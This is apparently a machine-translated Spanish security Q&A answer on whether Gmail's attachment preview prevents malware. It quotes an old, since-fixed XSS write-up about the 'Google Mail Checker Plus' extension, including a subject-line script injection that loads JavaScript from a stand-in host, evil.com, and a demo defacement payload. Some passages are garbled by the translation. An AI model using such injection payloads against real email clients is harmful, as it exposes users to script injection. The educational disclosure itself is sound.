¿La función de "vista previa" de Gmail para los documentos en el navegador previene el malware?

Evitará la explotación de cualquier vulnerabilidad exclusiva de la aplicación que usaría para abrir normalmente el archivo adjunto (por ejemplo, el lector de Adobe, el visor de imágenes, etc.).

No evitará la explotación de vulnerabilidades en el navegador debido a la prestación del archivo adjunto (aunque esto sería difícil, ya que el atacante tendría que crear un exploit de navegador que funcione con la implementación específica de la versión preliminar que Google está usando).

Y no evitará la explotación de vulnerabilidades en ningún algoritmo o biblioteca compartida con el previsualizador y su aplicación habitual. Sin embargo, para la vista previa, nuevamente el atacante tendría que diseñar el adjunto de una manera específica no solo para explotar la biblioteca, sino para tener esta vulnerabilidad y luego generar la vulnerabilidad apropiada del navegador. La vulnerabilidad del navegador podría tomar la forma de un vector de ataque simple como un ataque XSS, que sería más fácil de lograr.

Cuando abre un documento adjunto en Gmail utilizando el modo de vista previa (si puedo decirlo), está más seguro porque solo es una imagen del archivo adjunto ; puede imaginar esta imagen como una captura de pantalla , me refiero a que abrir el documento de esa manera lo hace más seguro porque no incluye las funcionalidades del documento original :

Sinembargo, Google Mail Checker Plus extension, muestra un archivo en una ventana emergente como lo describiste. La vista previa del archivo de esa manera no lo expone a un riesgo , al igual que en la funcionalidad descrita anteriormente, sin embargo (un caso que refleja el comentario de @ shroeder a su pregunta) Lo reproduzco para usted un ejemplo de vulnerabilidad que fue explotado en el pasado permitiendo un ataque XSS:

  

Permite ver la extensión popular (18,368 instalaciones por semana) llamada   "Google Mail Checker Plus" [#] . Esta extensión simplemente muestra el   número de mensajes no leídos en su bandeja de entrada de Gmail, puede hacer una vista previa de   correo y soporta notificaciones de escritorio .

     

.. figura ::    enlace

Mail preview in popup of Google Mail Checker Plus

     

En la vista previa podemos ver al menos el sujeto, desde y parte del cuerpo de   carta. Ok, enviemos una carta con un asunto como: ::

2"'><script src="http://evil.com/own.js"></script>

    

own.jsesunacargaútildedemostraciónjavascriptsencilla:::

document.body.innerHTML='';img=newImage();img.src='http://evil.com/stallowned.jpg';document.body.appendChild(img);

    

Porprimeravezvemosdichanotificación:

    

..figura::   enlace

XSS in Google Mail Checker Plus notification part

     

Por segundo, hacemos clic en el icono de la extensión y vemos nuestra carga útil trabajada   en la ventana emergente:

     

.. figure :: enlace

XSS in Google Mail Checker Plus 

     

¡Funciona! Por cierto, este XSS ya ha sido informado por Lostmon en    03 de junio de 2010 y la versión fija de la extensión está disponible. Lostmon escribió que: "Todas las extensiones recorren su origen y no tienen forma de   datos alterados       desde la extensión u obtener datos confidenciales como, cuenta de correo electrónico o contraseña       etc. "

     

Descubramos esta vulnerabilidad web en el contexto de esta extensión   para entender los riesgos.

     

.. [#]    enlace   .. _reportó:    enlace   .. _notificaciones:    enlace